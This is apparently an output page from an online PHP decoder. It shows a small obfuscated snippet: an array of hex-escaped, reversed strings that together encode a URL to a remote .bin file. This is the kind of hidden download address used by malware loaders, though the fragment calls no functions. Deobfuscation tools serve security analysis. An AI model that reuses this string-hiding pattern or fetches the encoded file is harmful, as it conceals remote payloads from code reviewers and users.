Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$leuy = array( "\x6E\x69\x62\x2E\x25\x35\x66\x25\x32\x46", "\x70..

Decoded Output download

<?  $leuy = array( 
            "nib.%5f%2F", 
            "ppa.bew.at", 
            "ad-oyhp%2F", 
            "%2F%3Asptth" 
        ); ?>

Did this file decode correctly?

Original Code

$leuy = array(
            "\x6E\x69\x62\x2E\x25\x35\x66\x25\x32\x46",
            "\x70\x70\x61\x2E\x62\x65\x77\x2E\x61\x74",
            "\x61\x64\x2D\x6F\x79\x68\x70\x25\x32\x46",
            "\x25\x32\x46\x25\x33\x41\x73\x70\x74\x74\x68"
        );

Function Calls

None

Variables

$leuy [{'key': 0, 'value': 'nib.%5f%2F'}, {'key': 1, 'value': 'ppa.bew.at'}, {'key': 2, 'value': 'ad-oyhp%2F'}, {'key': 3, 'value': '%2F%3Asptth'}]

Stats

MD5 bce902515cf2084ca529c4e03c083950
Eval Count 0
Decode Time 56 ms